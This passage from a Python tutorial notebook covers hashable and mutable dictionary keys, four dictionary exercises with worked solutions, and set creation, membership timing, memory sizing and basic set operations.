            return self.x == other.x and self.y == other.y
        else:
            return False
        
    def __hash__(self):
        return hash((self.x, self.y))

In [86]:
points = {Point(0,0): 'origin', Point(1,1): 'pt at (1,1)'}

In [87]:
points[Point(0,0)]

'origin'

In [88]:
points[(0,0)]

'origin'

In fact:

In [89]:
(0,0) == Point(0,0)

True

You'll notice that our `Point` class is technically mutable.
So we could do something like this:

In [90]:
pt1 = Point(0,0)
pt2 = Point(1,1)
points = {pt1: 'origin', pt2: 'pt at (1,1)'}

In [91]:
points[pt1], points[Point(0,0)], points[(0,0)]

('origin', 'origin', 'origin')

But what happens if we mutate `pt1`?

In [92]:
pt1.x = 10

In [93]:
pt1

(10, 0)

In [94]:
points[pt1]

KeyError: (10, 0)

So we can't recover our item using `pt1`. That's because the hash of `pt1` has changed, so Python starts looking in the wrong place in the dictionary.

Let's see what the items are in the dictionary:

In [95]:
for k, v in points.items():
    print(k, v)

(10, 0) origin
(1, 1) pt at (1,1)


So can we recover that 'origin' point using a different key maybe?

In [96]:
points[Point(10, 0)]

KeyError: (10, 0)

No, again because the hash under which the original point `pt1` was stored is not the same as the new hash for that same object.

This is why we should not use mutable keys in a dictionary!

So, in this case, although we cannot technically enforce immutability, we can use conventions to indicate the object is supposed to be immutable:

In [97]:
class Point:
    def __init__(self, x, y):
        self._x = x
        self._y = y
    
    @property
    def x(self):
        return self._x
    
    @property
    def y(self):
        return self._y
    
    def __repr__(self):
        return f'({self.x}, {self.y})'
    
    def __eq__(self, other):
        if isinstance(other, tuple) and len(other) == 2:
            other = Point(*other)
        if isinstance(other, Point):
            return self.x == other.x and self.y == other.y
        else:
            return False
        
    def __hash__(self):
        return hash((self.x, self.y))

Everything works just as before, but naming the underlying attributes `_x` and `_y` indicates these are private and should not be modified directly.
Furthermore we only created attribute getters, not setters for `x` and `y`:

In [98]:
pt = Point(0,0)

In [99]:
pt.x

0

In [100]:
pt.x = 10

AttributeError: can't set attribute
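
As an aside, the standard library's `dataclasses` module offers another way to get similar behavior with less code. This is an alternative to the class above, not a description of it: a frozen dataclass generates `__eq__` and `__hash__` from its fields and rejects attribute assignment. Note that the generated `__eq__` only compares instances of the same class, so the tuple lookup from the earlier example would still need a custom `__eq__`. `FrozenPoint` is a name chosen for this sketch.

```python
from dataclasses import dataclass, FrozenInstanceError


@dataclass(frozen=True)
class FrozenPoint:
    x: int
    y: int


points = {FrozenPoint(0, 0): 'origin', FrozenPoint(1, 1): 'pt at (1,1)'}
print(points[FrozenPoint(0, 0)])   # origin

pt = FrozenPoint(0, 0)
try:
    pt.x = 10
except FrozenInstanceError as ex:
    # FrozenInstanceError is a subclass of AttributeError
    print('cannot modify:', ex)
```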

# Section 04 - Coding Exercises

##  Coding Exercises

#### Exercise 1

Write a Python function that will create and return a dictionary from another dictionary, but sorted by value. You can assume the values are all comparable and have a natural sort order.

For example, given the following dictionary:

In [1]:
composers = {'Johann': 65, 'Ludwig': 56, 'Frederic': 39, 'Wolfgang': 35}

Your function should return a dictionary that looks like the following:

In [2]:
sorted_composers = {'Wolfgang': 35,
                    'Frederic': 39, 
                    'Ludwig': 56,
                    'Johann': 65}

Remember if you are using Jupyter notebook to use `print()` to view your dictionary in its natural ordering (in case Jupyter displays your dictionary sorted by key).

Also try to keep your code Pythonic - i.e. don't start with an empty dictionary and build it up one key at a time - look for a different, more Pythonic, way of doing it. 

Hint: you'll likely want to use Python's `sorted` function.

---

#### Exercise 2

Given two dictionaries, `d1` and `d2`, write a function that creates a dictionary that contains only the keys common to both dictionaries, with values being a tuple containing the values from `d1` and `d2`. (Order of keys is not important).

For example, given two dictionaries as follows:

In [3]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'b': 20, 'c': 30, 'y': 40, 'z': 50}

Your function should return a dictionary that looks like this:

In [4]:
d = {'b': (2, 20), 'c': (3, 30)}

Hint: Remember that `s1 & s2` will return the intersection of two sets.

Again, try to keep your code Pythonic - don't just start with an empty dictionary and build it up one by one - think of a cleaner approach.

---

#### Exercise 3

You have text data spread across multiple servers.
Each server is able to analyze this data and return a dictionary that contains words and their frequency.

Your job is to combine this data to create a single dictionary that contains all the words and their combined frequencies from all these data sources. Bonus points if you can make your dictionary sorted by frequency (highest to lowest).

For example, you may have three servers that each return these dictionaries:

In [5]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [6]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [7]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

---

#### Exercise 4

For this exercise suppose you have a web API load balanced across multiple nodes. This API receives various requests for resources and logs each request to some local storage. Each instance of the API is able to return a dictionary containing the resource that was accessed (the dictionary key) and the number of times it was requested (the associated value).

Your task here is to identify resources that have been requested on some, but not all the servers, so you can determine if you have an issue with your load balancer not distributing certain resource requests across all nodes.

For simplicity, we will assume that there are exactly 3 nodes in the cluster.

You should write a function that takes 3 dictionaries as arguments for node 1, node 2, and node 3, and returns a dictionary that contains only keys that are not found in **all** of the dictionaries. The value should be a tuple containing the number of times it was requested in each node (the node order should match the dictionary (node) order passed to your function). Use `0` if the resource was not requested from the corresponding node.

Suppose your dictionaries are for logs of all the GET requests on each node:

In [8]:
n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}
n2 = {'employees': 250, 'users': 23, 'user': 230}
n3 = {'employees': 150, 'users': 4, 'login': 1000}

Your result should then be:

In [9]:
result = {'employee': (5000, 0, 0),
          'user': (100, 230, 0),
          'login': (0, 0, 1000)}

Tip: 
to find the difference between two sets, you can subtract one from the other:

In [10]:
s1 = {1, 2, 3, 4}
s2 = {1, 2, 3}
s1 - s2

{4}

Tip: to get the union of two (or more) sets you can use the `|` operator:

In [11]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s1 | s2

{1, 2, 3, 4}

Tip: to get the intersection of two (or more) sets you can use the `&` operator:

In [12]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s1 & s2

{2, 3}

Hint: It might be helpful to draw out a set diagram and consider what subset you are trying to isolate.

##  Coding Exercises - Solution 1

#### Exercise 1

Write a Python function that will create and return a dictionary from another dictionary, but sorted by value. You can assume the values are all comparable and have a natural sort order.

For example, given the following dictionary:

In [1]:
composers = {'Johann': 65, 'Ludwig': 56, 'Frederic': 39, 'Wolfgang': 35}

Your function should return a dictionary that looks like the following:

In [2]:
sorted_composers = {'Wolfgang': 35,
                    'Frederic': 39, 
                    'Ludwig': 56,
                    'Johann': 65}

Remember if you are using Jupyter notebook to use `print()` to view your dictionary in its natural ordering (Jupyter will display your dictionary sorted by key).

Also try to keep your code Pythonic - i.e. don't start with an empty dictionary and build it up one key at a time - look for a different, more Pythonic, way of doing it. 

Hint: you'll likely want to use Python's `sorted` function.

##### Solution

My approach here is to sort the `items()` view using Python's `sorted` function and a custom `key` that uses the dictionary values (or second element of each tuple in the `items` view):

In [3]:
composers = {'Johann': 65, 'Ludwig': 56, 'Frederic': 39, 'Wolfgang': 35}

def sort_dict_by_value(d):
    d = {k: v
        for k, v in sorted(d.items(), key=lambda el: el[1])}
    return d

In [4]:
print(sort_dict_by_value(composers))

{'Wolfgang': 35, 'Frederic': 39, 'Ludwig': 56, 'Johann': 65}


Here's a better approach - instead of using a dictionary comprehension, we can simply use the `dict()` function to create a dictionary from the sorted tuples!

In [5]:
def sort_dict_by_value(d):
    return dict(sorted(d.items(), key=lambda el: el[1]))

And we end up with the same end result:

In [6]:
sort_dict_by_value(composers)

{'Wolfgang': 35, 'Frederic': 39, 'Ludwig': 56, 'Johann': 65}

##  Coding Exercises - Solution 2

#### Exercise 2

Given two dictionaries, `d1` and `d2`, write a function that creates a dictionary that contains only the keys common to both dictionaries, with values being a tuple containing the values from `d1` and `d2`. (Order of keys is not important).

For example, given two dictionaries as follows:

In [1]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'b': 20, 'c': 30, 'y': 40, 'z': 50}

Your function should return a dictionary that looks like this:

In [2]:
d = {'b': (2, 20), 'c': (3, 30)}

Hint: Remember that `s1 & s2` will return the intersection of two sets.

Again, try to keep your code Pythonic - don't just start with an empty dictionary and build it up one by one - think of a cleaner approach.

##### Solution

My approach here is to use set intersections to find the keys common to both dictionaries.
Then I use a dictionary comprehension to build up my new dictionary, making each value in the new dictionary a tuple containing the values from the original dictionaries:

In [3]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'b': 20, 'c': 30, 'y': 40, 'z': 50}

def intersect(d1, d2):
    d1_keys = d1.keys()
    d2_keys = d2.keys()
    keys = d1_keys & d2_keys
    d = {k: (d1[k], d2[k]) for k in keys}
    return d

In [4]:
intersect(d1, d2)

{'b': (2, 20), 'c': (3, 30)}

##  Coding Exercises - Solution 3

#### Exercise 3

In [1]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [2]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [3]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

##### Solution

My approach here is to first create a combined dictionary that contains all the keys from all the dictionaries, and adds the values together if the key exists in more than one dictionary.
I do this by looping through all the dictionaries and all the items in each of those dictionaries.
You could do this instead by first getting all the keys and unioning them to create a dictionary with just the keys, but then you would still have to look up each key in each dictionary to see if it is present. That's three lookups for each key (or as many lookups as we have input dictionaries), so I think it's probably more efficient to just take the first approach I mention.

Then in a second phase, I create a new dictionary based on the one I just created to have it sorted by the value.

In [4]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

def merge(*dicts):
    unsorted = {}
    for d in dicts:
        for k, v in d.items():
            unsorted[k] = unsorted.get(k, 0) + v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

In [5]:
merged = merge(d1, d2, d3)
for k, v in merged.items():
    print(k, v)

python 17
javascript 15
java 13
c# 12
c++ 10
go 9
erlang 5
haskell 2
pascal 1


In [6]:
merged = merge(d1, d2)
for k, v in merged.items():
    print(k, v)

python 16
javascript 15
java 13
c# 12
c++ 10
go 9
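
As an aside, the same merge can be sketched with `collections.Counter` from the standard library. This is just an alternative I am suggesting here, not the approach used above, and the name `merge_with_counter` is made up for illustration. `Counter.update` adds counts for keys that already exist, and `most_common()` returns the pairs ordered from highest to lowest count:

```python
from collections import Counter

d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

def merge_with_counter(*dicts):
    # hypothetical alternative to merge(); Counter.update ADDS counts
    # for existing keys instead of replacing them
    total = Counter()
    for d in dicts:
        total.update(d)
    # most_common() yields (key, count) pairs from highest to lowest count
    return dict(total.most_common())

merged_alt = merge_with_counter(d1, d2, d3)
for k, v in merged_alt.items():
    print(k, v)
```

The nested loop in `merge` is replaced by one `update` call per dictionary; the sorting step is essentially the same idea, just hidden inside `most_common()`.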


##  Coding Exercises - Solution 4

#### Exercise 4

For this exercise suppose you have a web API load balanced across multiple nodes. This API receives various requests for resources and logs each request to some local storage. Each instance of the API is able to return a dictionary containing the resource that was accessed (the dictionary key) and the number of times it was requested (the associated value).

Your task here is to identify resources that have been requested on some, but not all the servers, so you can determine if you have an issue with your load balancer not distributing certain resource requests across all nodes.

For simplicity, we will assume that there are exactly 3 nodes in the cluster.

You should write a function that takes 3 dictionaries as arguments for node 1, node 2, and node 3, and returns a dictionary that contains only keys that are not found in **all** of the dictionaries. The value should be a tuple containing the number of times it was requested in each node (the node order should match the dictionary (node) order passed to your function). Use `0` if the resource was not requested from the corresponding node.

Suppose your dictionaries are for logs of all the GET requests on each node:

In [1]:
n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}
n2 = {'employees': 250, 'users': 23, 'user': 230}
n3 = {'employees': 150, 'users': 4, 'login': 1000}

Your result should then be:

In [2]:
result = {'employee': (5000, 0, 0),
          'user': (100, 230, 0),
          'login': (0, 0, 1000)}

Tip: to find the difference between two sets, you can subtract one from the other:

In [3]:
s1 = {1, 2, 3, 4}
s2 = {1, 2, 3}
s1 - s2

{4}

Tip: to get the union of two (or more) sets you can use the `|` operator:

In [4]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s1 | s2

{1, 2, 3, 4}

Tip: to get the intersection of two (or more) sets you can use the `&` operator:

In [5]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s1 & s2

{2, 3}

Hint: It might be helpful to draw out a set diagram and consider what subset you are trying to isolate.

##### Solution

The approach I am going to take here is to merge all the keys into a single set, then remove from it the intersection of all the keys (i.e. remove keys that are common to all dictionaries).
Once I have that set of keys, I will pull the frequency from each dictionary (node) and build up a tuple of these frequencies.

In [6]:
n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}
n2 = {'employees': 250, 'users': 23, 'user': 230}
n3 = {'employees': 150, 'users': 4, 'login': 1000}

In [7]:
union = n1.keys() | n2.keys() | n3.keys()
intersection = n1.keys() & n2.keys() & n3.keys()

In [8]:
union, intersection, union - intersection

({'employee', 'employees', 'login', 'user', 'users'},
 {'employees', 'users'},
 {'employee', 'login', 'user'})

In [9]:
def identify(node1, node2, node3):
    union = node1.keys() | node2.keys() | node3.keys()
    intersection = node1.keys() & node2.keys() & node3.keys()
    relevant = union - intersection
    result = {key: (node1.get(key, 0),
                    node2.get(key, 0),
                    node3.get(key, 0))
              for key in relevant}
    return result        

In [10]:
result = identify(n1, n2, n3)
for k, v in result.items():
    print(f'{k}: {v}')

login: (0, 0, 1000)
user: (100, 230, 0)
employee: (5000, 0, 0)
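
The exercise assumes exactly 3 nodes, but the same idea extends to any number of nodes. Here is a minimal sketch of that generalization (the name `identify_any` is hypothetical, it is not part of the exercise). It relies on the fact that the `union` and `intersection` methods accept any iterables, and that iterating a dictionary yields its keys:

```python
n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}
n2 = {'employees': 250, 'users': 23, 'user': 230}
n3 = {'employees': 150, 'users': 4, 'login': 1000}

def identify_any(*nodes):
    # hypothetical generalization of identify() to any number of nodes
    if not nodes:
        return {}
    # iterating a dict yields its keys, so dicts can be passed directly
    union = set().union(*nodes)
    intersection = set(nodes[0]).intersection(*nodes[1:])
    relevant = union - intersection
    # one frequency per node, in the order the nodes were passed in
    return {key: tuple(node.get(key, 0) for node in nodes)
            for key in relevant}

result_any = identify_any(n1, n2, n3)
for k, v in result_any.items():
    print(f'{k}: {v}')
```

As before, the order in which the keys are printed is not something we can rely on, since `relevant` is a set.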


# Section 05 - Sets

##  Creating Sets

Just like dictionaries, there is a variety of ways to create sets.

First we have set literals:

In [1]:
s = {'a', 100, (1,2)}

In [2]:
type(s)

set

To create an empty set we cannot use `{}` since that would create an empty dictionary:

In [3]:
d = {}
type(d)

dict

Instead, we have to use the `set()` function:

In [4]:
s = set()

In [5]:
type(s)

set

This brings up the second way we can create sets. We can use the `set()` function and pass it an iterable:

In [6]:
s = set([1, 2, 3])

In [7]:
s

{1, 2, 3}

or even:

In [8]:
s = set(range(10))

In [9]:
s

{0, 1, 2, 3, 4, 5, 6, 7, 8, 9}

Of course we are restricted to an iterable of hashable elements only.

So this would not work:

In [10]:
s = set([[1,2], [3,4]])

TypeError: unhashable type: 'list'

What might surprise you is this:

In [11]:
d = {'a': 1, 'b': 2}
s = set(d)

See? No exception!

But consider what happens when we iterate a dictionary:

In [12]:
for e in d:
    print(e)

a
b


We just get the keys back! All dictionary keys are hashable, and therefore we can always create a set from a dictionary, but it will just contain the keys:

In [13]:
s

{'a', 'b'}

Next we can use a **set comprehension** to create a set. It looks and works almost the same as a dictionary comprehension - but a set, unlike a dictionary, has no associated values. 
Here's an example:

In [14]:
s = {c for c in 'python'}

In [15]:
s

{'h', 'n', 'o', 'p', 't', 'y'}

Of course, we do not really need to use a comprehension here. Since strings are iterables of characters (which are hashable), we can create a set from the characters in a string as follows:

In [16]:
s = set('python')
s

{'h', 'n', 'o', 'p', 't', 'y'}

Just like we have iterable unpacking and dictionary unpacking, we also have set unpacking:

In [17]:
s1 = {'a', 'b', 'c'}
s2 = {10, 20, 30}

To combine the elements of both these sets, we cannot do this:

In [18]:
s = {s1, s2}

TypeError: unhashable type: 'set'

This would be a set of sets - and sets are not hashable anyway (we could use a frozenset, but more about those later).

What we want is to unpack the elements of the sets into something else.

We could create a set containing all these elements:

In [19]:
s = {*s1, *s2}

In [20]:
s

{10, 20, 30, 'a', 'b', 'c'}

What's interesting about the unpacking though, is that we are not restricted to just creating another set:

In [21]:
l = [*s1, *s2]

In [22]:
l

['b', 'a', 'c', 10, 20, 30]

or even to pass as arguments to a function - with a big caveat!

In [23]:
def my_func(a, b, c):
    print(a, b, c)

In [24]:
args = {20, 10, 30}

We cannot just pass the set directly to `my_func` because it expects three arguments, but we can unpack the set before we pass it:

In [25]:
my_func(*args)

10 20 30


Notice the order of the arguments! As we know, order of elements in a set is considered random (it's not of course, but for all practical purposes it might as well be).

In some cases however, it might not matter.
Consider this function:

In [26]:
def averager(*args):
    total = 0
    for arg in args:
        total += arg
    return total / len(args)

In [27]:
averager(10, 20, 30)

20.0
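
To tie this back to set unpacking, here is a small sketch that passes the unpacked set to `averager`. Whatever order the elements come out of the set, the sum (and therefore the average) is the same:

```python
def averager(*args):
    total = 0
    for arg in args:
        total += arg
    return total / len(args)

args = {20, 10, 30}
# the unpacking order is unknown, but addition does not care about order
result = averager(*args)
print(result)
```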

#### Distinct Elements

We know that set elements must be distinct - so how do all these methods we have seen for creating sets behave when we have repeated elements?

Let's take a look at each, one at a time:

In [28]:
s = {'a', 'b', 'c', 'a', 'b', 'c'}
s

{'a', 'b', 'c'}

As you can see, Python just discards any repeated element.

The same happens with the `set()` function:

In [29]:
s = set('baabaa')
s

{'a', 'b'}

And the same with a comprehension:

In [30]:
s = {c for c in 'moomoo'}
s

{'m', 'o'}

Now unpacking is a little different. If we unpack into a set, then sure, elements will remain distinct:

In [31]:
s1 = {10, 20, 30}
s2 = {20, 30, 40}
s = {*s1, *s2}
s

{10, 20, 30, 40}

But if we unpack into a tuple for example:

In [32]:
t = (*s1, *s2)

In [33]:
t

(10, 20, 30, 40, 20, 30)

As you can see, we get repeated elements.

#### Application

So, one really interesting application of sets and the fact that their elements are unique, is finding unique elements from collections whose elements might not be.

Consider this problem. We have a string, and we want to assign a score to the string based on how many distinct characters of the alphabet it uses.

(I'm considering an alphabet here to be 'a' - 'z'). So the total length of that alphabet is 26, and we can score a string this way:

In [34]:
s = 'abcdefghijklmnopqrstuvwxyz'
distinct = set(s)
score = len(distinct) / 26
score

1.0

Let's write a function to do this (and remove any characters that are not part of our 'alphabet'):

In [35]:
def scorer(s):
    alphabet = set('abcdefghijklmnopqrstuvwxyz')
    s = s.lower()
    distinct = set(s)
    # we want to only count characters that are in our alphabet
    effective = distinct & alphabet
    return len(effective) / len(alphabet)

In [36]:
scorer(s)

1.0

In [37]:
scorer('baa baa')

0.07692307692307693

In [38]:
2 / 26

0.07692307692307693

In [39]:
scorer('baa baa baa!!! 123')

0.07692307692307693

In [40]:
scorer('the quick brown fox jumps over the lazy dog')

1.0

Often we are presented with problems where we have a list, or other collection, and we just want to find the unique elements of that list.
As long as the elements are all hashable, we can easily do this using sets!
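
Here is a minimal sketch of that idea, using some made-up data. Converting to a set loses the original order, so I also show two common ways to get a list back: sorting the set, or using `dict.fromkeys` to keep the first occurrence of each element in its original position (this relies on dictionaries preserving insertion order, so Python 3.6+ in practice):

```python
data = [3, 1, 3, 2, 1, 3]

# distinct elements - order is not something we can rely on
unique = set(data)

# distinct elements, sorted
unique_sorted = sorted(unique)

# distinct elements, in order of first appearance
unique_in_order = list(dict.fromkeys(data))

print(unique_sorted)
print(unique_in_order)
```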

##  Common Set Operations

Let's look at some of the more basic and common operations with sets:
* size
* membership testing
* adding elements
* removing elements

#### Size

The size of a set (its cardinality), is given by the `len()` function - the same one we use for sequences, iterables, dictionaries, etc.

In [1]:
s = {1, 2, 3}
len(s)

3

#### Membership Testing

This is also very easy:

In [2]:
s = {1, 2, 3}

In [3]:
1 in s

True

In [4]:
10 in s

False

In [5]:
1 not in s

False

In [6]:
10 not in s

True

But let's go a little further and consider how membership testing works with sets. As I mentioned in earlier lectures, sets are hash tables, and membership testing is **extremely** efficient for sets, since it's simply a hash table lookup - as opposed to scanning a list for example, until we find the requested element (or not).

Let's do some quick timings to verify this, and also compare lookup speeds for sets and dictionaries (which are also, after all, hash tables).

In [7]:
from timeit import timeit

In [8]:
n = 100_000
s = {i for i in range(n)}
l = [i for i in range(n)]
d = {i:None for i in range(n)}

Let's time how long it takes to find if `9` is in the object. It is only the tenth element of the list and of the dictionary (keys), and who knows where it sits in the set:

In [9]:
number = 1_000_000
search = 9
t_list = timeit(f'{search} in l', globals=globals(), number=number)
t_set = timeit(f'{search} in s', globals=globals(), number=number)
t_dict = timeit(f'{search} in d', globals=globals(), number=number)
print('list:', t_list)
print('set:', t_set)
print('dict:', t_dict)

list: 0.09865150199038908
set: 0.025414875999558717
dict: 0.029280081973411143


The story changes even more if we test for example the last element of the list.
I'm definitely not going to run the tests `1_000_000` times - not unless we want to make this video reaaaaaaly long!

In [10]:
number = 3_000
search = 99_999
t_list = timeit(f'{search} in l', globals=globals(), number=number)
t_set = timeit(f'{search} in s', globals=globals(), number=number)
t_dict = timeit(f'{search} in d', globals=globals(), number=number)
print('list:', t_list)
print('set:', t_set)
print('dict:', t_dict)

list: 2.287420156993903
set: 9.811401832848787e-05
dict: 0.00010706903412938118


The situation for `not in` is the same:

In [11]:
number = 3_000
search = -1
t_list = timeit(f'{search} not in l', globals=globals(), number=number)
t_set = timeit(f'{search} not in s', globals=globals(), number=number)
t_dict = timeit(f'{search} not in d', globals=globals(), number=number)
print('list:', t_list)
print('set:', t_set)
print('dict:', t_dict)

list: 2.031598252011463
set: 7.687101606279612e-05
dict: 7.940799696370959e-05


But this efficiency does come at the cost of memory:

In [12]:
print(d.__sizeof__())
print(s.__sizeof__())
print(l.__sizeof__())

5242952
4194504
824440


Even for empty objects:

In [13]:
s = set()
d = dict()
l = list()

In [14]:
print(d.__sizeof__())
print(s.__sizeof__())
print(l.__sizeof__())

216
200
40


And adding just one element to each object:

In [15]:
s.add(10)
d[10] = None
l.append(10)

In [16]:
print(d.__sizeof__())
print(s.__sizeof__())
print(l.__sizeof__())

216
200
72


If you're wondering why the dictionary and set size did not increase, remember when we covered hash tables - there is some overallocation that takes place so we don't incur the cost of resizing every time we add an element. In fact, lists do the same as well - they over-allocate to reduce the resizing cost. I'll come back to that in a minute.

#### Adding Elements

When we have an existing set, we can always add elements to it. Of course *where* it gets "inserted" is unknown. So Python does not call it `append` or `insert` which would connote ordering of some kind - instead it just calls it `add`:

In [17]:
s = {30, 20, 10}

In [18]:
s.add(15)

In [19]:
s

{10, 15, 20, 30}

Don't be fooled by the apparent ordering of the elements here. This is the same as with dictionaries - Jupyter tries to represent things nicely for us, but behind the scenes:

In [20]:
print(s)

{10, 20, 30, 15}


In [21]:
s.add(-1)
print(s)

{10, 15, 20, 30, -1}


And the order just changed again! :-)

What's interesting about the `add()` method, is that if we try to add an element that already exists, Python will simply ignore it:

In [22]:
s

{-1, 10, 15, 20, 30}

In [23]:
s.add(15)

In [24]:
s

{-1, 10, 15, 20, 30}

Now that we know how to add an element to a set, let's go back and see how  the set, dictionary and list resize as we add more elements to them.
We should expect the list to be more efficient from a memory standpoint:

In [25]:
l = list()
s = set()
d = dict()

print('#', 'dict', 'set', 'list')
for i in range(50):
    print(i, d.__sizeof__(), s.__sizeof__(), l.__sizeof__())
    l.append(i)
    s.add(i)
    d[i] = None

# dict set list
0 216 200 40
1 216 200 72
2 216 200 72
3 216 200 72
4 216 200 72
5 216 712 104
6 344 712 104
7 344 712 104
8 344 712 104
9 344 712 168
10 344 712 168
11 624 712 168
12 624 712 168
13 624 712 168
14 624 712 168
15 624 712 168
16 624 712 168
17 624 712 240
18 624 712 240
19 624 712 240
20 624 712 240
21 624 2248 240
22 1160 2248 240
23 1160 2248 240
24 1160 2248 240
25 1160 2248 240
26 1160 2248 320
27 1160 2248 320
28 1160 2248 320
29 1160 2248 320
30 1160 2248 320
31 1160 2248 320
32 1160 2248 320
33 1160 2248 320
34 1160 2248 320
35 1160 2248 320
36 1160 2248 408
37 1160 2248 408
38 1160 2248 408
39 1160 2248 408
40 1160 2248 408
41 1160 2248 408
42 1160 2248 408
43 2256 2248 408
44 2256 2248 408
45 2256 2248 408
46 2256 2248 408
47 2256 2248 504
48 2256 2248 504
49 2256 2248 504


As you can see, the memory costs for a set or a dict are definitely higher than for a list. You can also see from this that CPython appears to implement different resizing strategies for sets, dicts and lists.
The strategy by the way has nothing to do with the size of the elements we put in those objects:

In [26]:
l = list()
s = set()
d = dict()

print('#', 'dict', 'set', 'list')
for i in range(50):
    print(i, d.__sizeof__(), s.__sizeof__(), l.__sizeof__())
    l.append(i**1000)
    s.add(i**1000)
    d[i**1000] = None

# dict set list
0 216 200 40
1 216 200 72
2 216 200 72
3 216 200 72
4 216 200 72
5 216 712 104
6 344 712 104
7 344 712 104
8 344 712 104
9 344 712 168
10 344 712 168
11 624 712 168
12 624 712 168
13 624 712 168
14 624 712 168
15 624 712 168
16 624 712 168
17 624 712 240
18 624 712 240
19 624 712 240
20 624 712 240
21 624 2248 240
22 1160 2248 240
23 1160 2248 240
24 1160 2248 240
25 1160 2248 240
26 1160 2248 320
27 1160 2248 320
28 1160 2248 320
29 1160 2248 320
30 1160 2248 320
31 1160 2248 320
32 1160 2248 320
33 1160 2248 320
34 1160 2248 320
35 1160 2248 320
36 1160 2248 408
37 1160 2248 408
38 1160 2248 408
39 1160 2248 408
40 1160 2248 408
41 1160 2248 408
42 1160 2248 408
43 2256 2248 408
44 2256 2248 408
45 2256 2248 408
46 2256 2248 408
47 2256 2248 504
48 2256 2248 504
49 2256 2248 504


As you can see the memory cost of the objects themselves did not change, nor did the sizing strategy (remember that all those objects contain pointers to the data, not the data itself - and a pointer to an object, no matter the size of that object, is always the same size).
So be careful using `__sizeof__` - it's often only part of the story.
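
To make "only part of the story" a bit more concrete, here is a rough sketch that compares the size of the container with the combined size of the elements it points to. I'm using `sys.getsizeof` here (it calls `__sizeof__` and adds any garbage collector overhead), and the variable names are just for illustration. The exact byte counts depend on your Python version and platform, so I'm not showing any output:

```python
import sys

small = [i for i in range(50)]
big = [i ** 1000 for i in range(50)]

# size of the list objects themselves (essentially the array of pointers)
container_small = sys.getsizeof(small)
container_big = sys.getsizeof(big)

# combined size of the integer objects the lists point to
elements_small = sum(sys.getsizeof(e) for e in small)
elements_big = sum(sys.getsizeof(e) for e in big)

print('containers:', container_small, container_big)
print('elements:  ', elements_small, elements_big)
```

The two containers report the same size, but the elements of `big` take up far more memory than those of `small`.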

#### Removing Elements

Now let's see how we can remove elements from a set.

Just as with dictionaries, we may be trying to remove an item that does not exist in the set. Depending on whether we want to silently ignore deletion of non-existent elements we can use one of two techniques:

In [27]:
s = {1, 2, 3}

In [28]:
s.remove(1)

In [29]:
s

{2, 3}

In [30]:
s.remove(10)

KeyError: 10

As you can see, we get an exception.

If we don't want the exception we can do it this way:

In [31]:
s.discard(10)

In [32]:
s

{2, 3}

We can also remove (and return) an **arbitrary** element from the set:

In [33]:
s = set('python')

In [34]:
s

{'h', 'n', 'o', 'p', 't', 'y'}

In [35]:
s.pop()

'h'

Note that we **do not know** ahead of time what element will get popped.

Also, popping an empty set will result in a `KeyError` exception:

In [36]:
s = set()
s.pop()

KeyError: 'pop from an empty set'

Something like that might be handy to handle all the elements of a set one at a time without caring for the order in which elements are removed from the set - not that you can, anyway - sets are not ordered!
But this way you can get at the elements of a set without knowing the content of the set (since you need to know the element you are removing with `remove` and `discard`).
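
A minimal sketch of that pattern, with made-up element names: we keep popping until the set is empty. An empty set is falsy, so the set itself can serve as the loop condition, and we never trigger the `KeyError`:

```python
pending = {'task-a', 'task-b', 'task-c'}
processed = []

# an empty set is falsy, so the loop stops once everything has been popped
while pending:
    item = pending.pop()   # arbitrary element - we do not control the order
    processed.append(item)

print(processed)
print(pending)
```

Keep in mind that this empties (mutates) the set, so make a copy first if you still need the original.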

Finally, you can empty out a set by calling the `clear` method:

In [37]:
s = {1, 2, 3}
s.clear()
s

set()

##  Set Operations

Let's go over the set operations that are available in Python.

##### Intersections

There are two ways to calculate the intersection of sets:

In [1]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}

In [2]:
s1.intersection(s2)

{2, 3}

In [3]:
s1 & s2

{2, 3}

We can compute the intersection of more than just two sets at a time:

In [4]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s3 = {3, 4, 5}

In [5]:
s1.intersection(s2, s3)

{3}

In [6]:
s1 & s2 & s3

{3}

